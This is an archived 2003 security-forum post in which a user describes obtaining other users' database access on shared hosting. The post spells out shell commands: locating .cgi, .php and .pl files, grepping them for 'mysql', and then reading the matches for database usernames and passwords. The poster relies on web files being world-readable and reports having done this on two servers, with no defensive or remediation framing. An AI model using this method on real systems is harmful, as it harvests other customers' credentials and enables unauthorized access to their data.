Gaining Access To Other Users Databases

Full Version: Gaining Access To Other Users Databases

GovernmentSecurity.org > System Security > Beginners Section

asdf

Oct 17 2003, 10:47 PM

i was bored, messin' around on my virtual account, and was able to obtain database access on two different servers.

it was quite simple:

step 1: build a list of files to grep
locate *.cgi > /tmp/list.txt
locate *.php >> /tmp/list.txt
locate *.pl >> /tmp/list.txt

step 2: grep files in the list.txt file for 'mysql'
for file in $(</tmp/list.txt); do grep -li 'mysql' $file; done > /tmp/mysql.txt

step 3: open mysql.txt and manually check the files for database usernames and passwords.

The reasoning here is that files served by apache need to be world readable. Thus if you are already on the system, you can read another user's files as long as you know the exact path (this is where using 'locate' comes in, by getting around the permission denied error when doing 'ls' in someone else's home directory).

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.